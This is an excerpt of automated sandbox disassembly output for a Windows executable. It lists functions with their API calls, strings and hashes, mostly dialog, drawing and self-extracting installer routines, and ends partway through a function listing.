Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6

GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
GlobalFree.KERNEL32(00000000), ref: 00402124

Strings

IMAGES, xrefs: 00402038
STATIC, xrefs: 00401FFD

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64

Function 00408B36 Relevance: 27.1, APIs: 18, Instructions: 144windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

GetDlgItem.USER32(?,000004B8), ref: 00408B63
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
GetDlgItem.USER32(?,000004B5), ref: 00408BB9
GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
GetDlgItem.USER32(?,000004B5), ref: 00408BCE
SetWindowLongW.USER32(00000000), ref: 00408BD1
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
GetDlgItem.USER32(?,000004B4), ref: 00408C13
SetFocus.USER32(00000000), ref: 00408C16
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
GetDlgItem.USER32(?,00000002), ref: 00408C86
IsWindow.USER32(00000000), ref: 00408C89
GetDlgItem.USER32(?,00000002), ref: 00408C99
EnableWindow.USER32(00000000), ref: 00408C9C
GetDlgItem.USER32(?,000004B5), ref: 00408CB0
ShowWindow.USER32(00000000), ref: 00408CB3

Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49

Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
String ID:
API String ID: 1057135554-0
Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C

Function 004072F5 Relevance: 24.3, APIs: 16, Instructions: 294COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040731D
GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
GetDlgItem.USER32(?,000004B4), ref: 00407359
GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
GetSystemMetrics.USER32(00000010), ref: 004073E0
GetSystemMetrics.USER32(00000011), ref: 004073E6
GetSystemMetrics.USER32(00000008), ref: 004073ED
GetSystemMetrics.USER32(00000007), ref: 004073F4
GetParent.USER32(?), ref: 00407418
GetClientRect.USER32(00000000,?), ref: 0040742A
ClientToScreen.USER32(?,?), ref: 0040743D
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
GetClientRect.USER32(?,?), ref: 0040753D

Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB

ClientToScreen.USER32(?,?), ref: 00407446

Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9

GetSystemMetrics.USER32(00000008), ref: 004075C2
GetSystemMetrics.USER32(00000007), ref: 004075C9

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65

Function 00403400 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 264COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7

Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4

Strings

SetEnvironment, xrefs: 00403613
0VA, xrefs: 0040363B, 00403641, 00403648, 00403651
{\rtf, xrefs: 00403584, 00403599

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@
String ID: 0VA$SetEnvironment${\rtf
API String ID: 613200358-2390373888
Opcode ID: 5f69abe73fede9d2a459a4d68537a5c3b0656311ba0a352affad076d63a13dd1
Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
Opcode Fuzzy Hash: 5f69abe73fede9d2a459a4d68537a5c3b0656311ba0a352affad076d63a13dd1
Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49

Function 0041382F Relevance: 16.6, APIs: 11, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0041385C
__p__fmode.MSVCRT ref: 00413871
__p__commode.MSVCRT ref: 0041387F
__setusermatherr.MSVCRT ref: 004138AB
_initterm.MSVCRT ref: 004138C1
__getmainargs.MSVCRT ref: 004138E4
_initterm.MSVCRT ref: 004138F4
GetStartupInfoA.KERNEL32(?), ref: 00413933
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00413957
exit.MSVCRT ref: 00413967
_XcptFilter.MSVCRT ref: 00413979

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58

Function 00407823 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00407831
GetWindowLongW.USER32(00000000), ref: 00407838
DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
GetSystemMetrics.USER32(00000031), ref: 0040787D
GetSystemMetrics.USER32(00000032), ref: 00407884
GetWindowDC.USER32(?), ref: 00407896
GetWindowRect.USER32(?,?), ref: 004078A3
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
ReleaseDC.USER32(?,00000000), ref: 004078DF

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65

Function 00403BA2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9

Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
wsprintfA.USER32 ref: 00403C31
wsprintfA.USER32 ref: 00403C5E

Strings

;!@Install@!UTF-8!, xrefs: 00403BAE
;!@InstallEnd@!, xrefs: 00403BBD
:%hs, xrefs: 00403C2B
:Language:%u, xrefs: 00403C58

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-695273242
Opcode ID: 43c56f4e942220a01f92bfecbb82701e771cd757a9e603f1f42b475f4263353d
Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
Opcode Fuzzy Hash: 43c56f4e942220a01f92bfecbb82701e771cd757a9e603f1f42b475f4263353d
Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99

Function 00407028 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040703C
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
GetDlgItem.USER32(?,000004B4), ref: 00407059
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
GetDlgItem.USER32(?,?), ref: 0040707A
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
GetDlgItem.USER32(?,?), ref: 0040708B
SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28

Function 00407649 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
GetWindow.USER32(?,00000005), ref: 0040767B
GetWindow.USER32(00000000,00000002), ref: 00407691

Strings

SetWindowTheme, xrefs: 0040765C
hA, xrefs: 00407684
uxtheme, xrefs: 0040764A

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: hA$SetWindowTheme$uxtheme
API String ID: 324724604-1539679821
Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC

Function 0040769E Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
GetDC.USER32(00000000), ref: 004076E7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
ReleaseDC.USER32(00000000,?), ref: 00407710
GetModuleHandleW.KERNEL32(00000000), ref: 00407738
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69

Function 0040720C Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040721C
GetSystemMetrics.USER32(0000000B), ref: 00407238
GetSystemMetrics.USER32(0000003D), ref: 00407241
GetSystemMetrics.USER32(0000003E), ref: 00407249
SelectObject.GDI32(?,?), ref: 00407266
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
SelectObject.GDI32(?,?), ref: 004072A7
ReleaseDC.USER32(?,?), ref: 004072B6

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40

Function 00408196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
GetDlgItem.USER32(?,000004B8), ref: 004081EE
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
wsprintfW.USER32 ref: 0040821E
??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6

Strings

%d%%, xrefs: 00408218

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: 1cca2f39a348a0152ebf7ec4c25e3beac73f54d8467528e78c91190636dc779a
Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
Opcode Fuzzy Hash: 1cca2f39a348a0152ebf7ec4c25e3beac73f54d8467528e78c91190636dc779a
Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68

Function 004083AD Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 004083C7
KillTimer.USER32(?,00000001), ref: 004083D8
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
SuspendThread.KERNEL32(00000298), ref: 0040841B
ResumeThread.KERNEL32(00000298), ref: 00408438
EndDialog.USER32(?,00000000), ref: 0040845A

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C

Function 00404032 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4

Strings

%%M/, xrefs: 00404096
%%M\, xrefs: 00404058

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: bb3227fb540b56c9b80e14b3640dd96904c21d3d09cc897a6efbba85ef8fc945
Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
Opcode Fuzzy Hash: bb3227fb540b56c9b80e14b3640dd96904c21d3d09cc897a6efbba85ef8fc945
Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88

Function 00403EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
